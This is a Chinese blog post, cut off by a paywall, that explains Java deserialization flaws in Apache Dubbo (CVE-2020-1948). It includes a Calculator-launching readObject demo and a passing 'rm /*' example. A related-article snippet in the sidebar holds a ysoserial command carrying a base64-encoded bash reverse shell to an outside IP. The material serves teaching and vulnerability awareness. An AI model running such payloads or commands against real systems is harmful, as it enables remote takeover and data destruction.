Dubbo 高危漏洞!原来都是反序列化惹得祸

最新推荐文章于 2024-09-21 02:50:28 发布
最新推荐文章于 2024-09-21 02:50:28 发布
阅读量1.2k 收藏 3
点赞数 2
分类专栏: Dubbo 文章标签: java 安全 Dubbo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014634309/article/details/107219614
版权
本文详细介绍了Apache Dubbo的反序列化漏洞,包括Java反序列化漏洞的基础知识、Common-Collections库中的风险以及如何利用这些漏洞执行恶意代码。通过实例展示了如何构造攻击链路,并讨论了Dubbo的修复措施和防护策略。提醒开发者关注官方修复版本,及时升级以避免安全风险。
摘要由CSDN通过智能技术生成

前言

这周收到外部合作同事推送的一篇文章,【漏洞通告】Apache Dubbo Provider默认反序列化远程代码执行漏洞(CVE-2020-1948)通告

按照文章披露的漏洞影响范围,可以说是当前所有的 Dubbo 的版本都有这个问题。

无独有偶,这周在 Github 自己的仓库上推送几行改动,不一会就收到 Github 安全提示,警告当前项目存在安全漏洞CVE-2018-10237

可以看到这两个漏洞都是利用反序列化进行执行恶意代码,可能很多同学跟我当初一样,看到这个一脸懵逼。好端端的反序列化,怎么就能被恶意利用,用来执行的恶意代码?

这篇文章我们就来聊聊反序列化漏洞,了解一下黑客是如何利用这个漏洞进行攻击。

先赞后看,养成习惯!微信搜索『程序通事』,关注就完事了!

反序列化漏洞

在了解反序列化漏洞之前,首先我们学习一下两个基础知识。

Java 运行外部命令

Java 中有一个类 Runtime,我们可以使用这个类执行执行一些外部命令。

下面例子中我们使用 Runtime 运行打开系统的计算器软件。

// 仅适用macos 
Runtime.getRuntime().exec("open -a Calculator ");

有了这个类,恶意代码就可以执行外部命令,比如执行一把 rm /*

序列化/反序列化

如果经常使用 Dubbo,Java 序列化与反序列化应该不会陌生。

一个类通过实现 Serializable接口,我们就可以将其序列化成二进制数据,进而存储在文件中,或者使用网络传输。

其他程序可以通过网络接收,或者读取文件的方式,读取序列化的数据,然后对其进行反序列化,从而反向得到相应的类的实例。

下面的例子我们将 App 的对象进行序列化,然后将数据保存到的文件中。后续再从文件中读取序列化数据,对其进行反序列化得到 App 类的对象实例。

public class App implements Serializable {
   

    private String name;

    private static final long serialVersionUID = 7683681352462061434L;


    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException {
   
        in.defaultReadObject();
        System.out.println("readObject name is "+name);
        Runtime.getRuntime().exec("open -a Calculator");
    }

    public static void main(String[] args) throws IOException, ClassNotFoundException {
   
        App app = new App();
        app.name = "程序通事";

        FileOutputStream fos = new FileOutputStream("test.payload");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        //writeObject()方法将Unsafe对象写入object文件
        os.writeObject(app);
        os.close();
        //从文件中反序列化obj对象
        FileInputStream fis = new FileInputStream("test.payload");
        ObjectInputStream ois = new ObjectInputStream(fis);
        //恢复对象
        App objectFromDisk = (App)ois.readObject();
        System.out.println("main name is "+objectFromDisk.name);
        ois.close();
    }

执行结果:

readObject name is 程序通事
main name is 程序通事

并且成功打开了计算器程序。

当我们调用 ObjectInputStream#readObject读取反序列化的数据,如果对象内实现了 readObject方法,这个方法将会被调用。

源码如下:

反序列化漏洞执行条件

上面的例子中,我们在 readObject 方法内主动使用Runtime执行外部命令。但是正常的情况下,我们肯定不会在 readObject写上述代码,除非是内鬼 ̄□ ̄||

如果可以找到一个对象,他的readObject方法可以执行任意代码,那么在反序列过程也会执行对应的代码。我们只要将满足上述条件的对象序列化之后发送给先相应 Java 程序,Java 程序读取之后,进行反序列化,就会执行指定的代码。

为了使反序列化漏洞成功执行需要满足以下条件:

  1. Java 反序列化应用中需要存在序列化使用的类,不然反序列化时将会抛出 ClassNotFoundException 异常。
  2. Java 反序列化对象的 readObject方法可以执行任何代码,没有任何验证或者限制。

引用一段网上的反序列化攻击流程,来源:https://xz.aliyun.com/t/7031

  1. 客户端构造payload(有效
最低0.47元/天 解锁文章
楼下小黑哥
关注
专栏目录
Apache Dubbo反序列化漏洞复现分析
include_voidmain的博客
03-10 3101
Apache Dubbo反序列化漏洞复现分析
Dubbo反序列化漏洞分析集合
AS011x的博客
09-09 3812
调用相应的反序列化函数对数据流进行反序列化操作。,如果不满足则直接抛出异常。若pojo为Map实例,则从pojo(也就是一开始的第三个参数)获取key为“class”的值,并通过反射得到class所对应的类type,再判断对象的类型进行下一步处理。在之前的分析我们知道了这个方法是用来获取数据体的一些信息用的,其一种利用方式就是通过在读取version的时候,调用readUTF方法,跟进。主要是通过获取tag位,进行相应的处理,但是这里关键的就是,当这里不是一个String类型的时候,将会抛出异常。
Apache Dubbo CVE-2020-1948 反序列化漏洞利用
weixin_46137328的博客
07-08 2152
0x00 漏洞背景2020年06月23日, Apache Dubbo 官方发布了Apache Dubbo 远程代码执行的风险通告,该漏洞编号为CVE-2020-1948,漏洞等级:高危。...
Dubbo3序列化安全问题
最新发布
mlfc0422的博客
09-21 1041
类检查机制确保服务提供者与消费者之间的兼容性和安全性,防止因类版本不匹配、方法签名不兼容或类缺失而引发的问题。类检查机制和接口检查是 Dubbo 3.0 为了提升安全性和兼容性而引入的重要特性。合理配置这些检查机制,可以有效防止因类版本不匹配和反序列化风险而带来的潜在问题。在开发和部署微服务时,建议根据应用需求合理配置相应的检查模式和接口检查。
生产dubbo漏洞问题修复
weixin_44939862的博客
02-01 1623
dubbo漏洞修复
Vulhub靶场Dubbo Java反序列化漏洞复现
X_python321的博客
08-03 286
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架
Dubbo 序列化
liyong1028826685的专栏
05-26 5001
前言 大家好,今天开始给大家分享 — Dubbo 专题之 Dubbo 序列化。在前一个章节我们介绍了 Dubbo 路由规则之标签路由,其实现原理为:如果消费端传递标签则和配置的动态规则和静态规则进行匹配,如果消费端未传递标签则使用服务提供端的本地配置的静态标签和动态配置标签进行匹配。同时我们也例举了常见的使用场景并且进行了源码解析来分析其实现原理。有的小伙伴可以想知道 Dubbo 远程调用数据传输是通过哪些方式进行数据的序列化呢?那么这个章节我们一起来讨论在我们的 Dubbo 有哪些序列化方式以及性能
源码分析Dubbo序列化-源码分析kryo序列化实现原理
2401_84048006的博客
04-22 1030
if (!// @6// @7代码@1:参数说明:Output output:输出流;Object object:待序列化的对象;代码@2:如果对象为空,写入Kryo.NULL(0),然后返回true,表示需要设置generic,后续会讲解一下generic(泛型支持)。代码@3:如果是基本类型,如果maybe(值可能为空),但该方法不为空,则设置为Kryo.NOT_NULL,然后返回false,表示非引用类型,需要持久化值。
Dubbo 序列化协议 5 连问,你接得住不.PDF
03-18
默认就是⾛ dubbo 协议,单⼀⻓连接,进⾏的是 NIO 异步通信,基于 hessian 作为序列化协议。使⽤的场景是:传输数据量⼩ (每次请求在 100kb 以内),但是并发量很⾼。 为了要⽀持⾼并发场景,⼀般是服务提供者就⼏...
漏洞复现-Apache Dubbo反序列化漏洞(CVE-2023-23638)
玄道的网安博客
08-11 342
GenericFilter 将根据客户端提供的接口名、方法名、方法参数类型列表,根据反射机制获取对应的方法,再根据客户端提供的反序列化方式将参数进行反序列化成 pojo 对象。遍历 Map 所有的 key, 并尝试获取与 key 对应的 setter 或 Field, 然后赋值因为上面的过程会同时获取可能的 setter 和 Field, 然后赋值, 所以我们基本上可以控制任何类的任何属性 (即使它没有对应的 setter)1、关闭对公网开放的Dubbo服务端端口,仅允许可信任的IP访问。
dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现
寒星的博客
06-02 2411
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 CVE-2019-17564 漏洞简介 Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个反序列化的操作,由于没有任何安全校验,于是可以造成反序列化执行任意代码。 影响版本 2.7.0 <= Ap.
有关Apache dubbo反序列化漏洞的复现及思考
码农小麦
06-07 1052
有关Apache dubbo反序列化漏洞(CVE-2019-17564)网上有许多漏洞复现文章,官方漏洞描述也说的很清楚,开启了http remoting协议时,存在反序列化漏洞。本身有关java漏洞反序列化占了很大一部分。大概流程就是应用程序在反序列化时执行了恶意代码导致RCE(remote command/code execute)。 先来看一个自定义对象反序列化引发RCE的示例: public class SerialDemo { public static void main(String[
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1409
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Dubbo 爆出严重漏洞
Java技术栈,分享最主流的Java技术
02-16 2271
2020年2月13日,Apache Dubbo出现了一个较为严重的漏洞反序列化漏洞漏洞编号:CVE-2019-17564)。攻击者利用该漏洞,可在目标网站上远程执行恶意代码,最终导致...
vulhub漏洞复现十二_dubbo
weixin_44193247的博客
01-18 2237
vulhub漏洞复现练习篇
Dubbo的xml实例注入解析
MCC_MCC_MCC的博客
08-10 1356
1.dubbo实现对xml配置文件解析主要有META-INF下的这三个配置文件,dubbo.xsd用于定义xml配置文件的格式;spring.handlers配置了xml的解析类;spring.schemas配置了xml域名上下文与xsd文件的对应关系 2.spring.handlers,com.alibaba.dubbo.config.spring.schema.DubboNamespac...
Java反序列化(一) - Java反射机制
Morphy_Amo的博客
12-12 937
Java反序列化的基础知识之一,java反射机制的实践过程
如何在Windows 10上打开计算器?
cunjiu9486的博客
10-14 2064
Simple or complex calculations are part of our daily life. As a popular operating system Windows provides the tool named Calculator in order to make our calculation in an easy and fast way. In this tu...
java--CommomCollections1 入门学习--part2
zyer
05-07 406
上篇文章对Transformer有了一些基本的了解,学习了常用的构造payload的几个Transformer,但是对其利用可能还不是很了解,那么这篇文章就试着利用构造简单的payload。 我们最终要实现Runtime.getRuntime().exec(command),但反序列化漏洞的时候执行命令的方法一般都是反射执行,常用的反射执行方法: Class run = Runtime.class; Method method = run.getMethod("getRuntime"); Object
dubbo反序列化导致Timestamp丢失时分秒,怎么办
06-02
这个问题是由于dubbo默认使用了Hessian2进行序列化反序列化,而Hessian2对于java.sql.Timestamp类型的序列化存在问题,会导致反序列化后的对象Timestamp的时分秒丢失。解决这个问题的方法是使用其他的序列化方式,比如使用Java的标准序列化方式或者使用JSON进行序列化反序列化。具体的做法如下: 1. 使用Java的标准序列化方式 在dubbo的配置文件,将序列化方式改为Java自带的序列化方式: ``` <dubbo:protocol name="dubbo" serialization="java" /> ``` 2. 使用JSON进行序列化反序列化dubbo的配置文件,将序列化方式改为fastjson或者jackson: ``` <dubbo:protocol name="dubbo" serialization="fastjson" /> ``` 或者 ``` <dubbo:protocol name="dubbo" serialization="jackson" /> ``` 其,fastjson和jackson都是常用的JSON序列化库。使用JSON进行序列化反序列化可以避免Hessian2对于Timestamp的序列化问题,同时还可以提高序列化反序列化的性能。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值